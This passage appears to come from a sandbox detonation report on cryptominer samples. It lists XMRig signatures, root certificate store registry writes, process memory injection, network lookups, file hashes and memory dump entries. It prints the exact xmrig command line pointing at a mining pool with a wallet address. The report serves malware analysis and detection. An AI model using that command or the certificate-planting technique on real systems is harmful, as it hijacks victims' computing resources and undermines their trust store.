memory/1236-64-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-65-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-66-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-67-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-68-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-69-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-70-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-71-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-72-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-73-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-74-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-75-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-76-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-77-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-78-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-79-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-80-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-81-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-82-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-83-0x00007FF795280000-0x00007FF795D83000-memory.dmp
memory/1236-84-0x00007FF795280000-0x00007FF795D83000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:56
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4588 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4588 wrote to memory of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2532-16-0x0000025C85E30000-0x0000025C85E50000-memory.dmp
memory/2532-17-0x0000025C85F80000-0x0000025C85FA0000-memory.dmp
memory/2532-18-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-21-0x0000025C85FC0000-0x0000025C85FE0000-memory.dmp
memory/2532-19-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-20-0x0000025C85FA0000-0x0000025C85FC0000-memory.dmp
memory/2532-22-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-23-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-24-0x0000025C85FA0000-0x0000025C85FC0000-memory.dmp
memory/2532-25-0x0000025C85FC0000-0x0000025C85FE0000-memory.dmp
memory/2532-26-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-27-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-28-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-29-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-30-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-31-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-32-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-33-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-34-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-35-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-36-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-37-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-38-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-39-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-40-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-41-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-42-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-43-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-44-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-45-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-46-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-47-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-48-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-49-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-50-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-51-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-52-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-53-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-54-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-55-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-56-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-57-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-58-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-59-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-60-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-61-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-62-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-63-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-64-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-65-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-66-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-67-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-68-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-69-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-70-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-71-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-72-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-73-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-74-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-75-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-76-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-77-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-78-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-79-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-80-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-81-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-82-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-83-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
memory/2532-84-0x00007FF7C8AC0000-0x00007FF7C95C3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:58
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1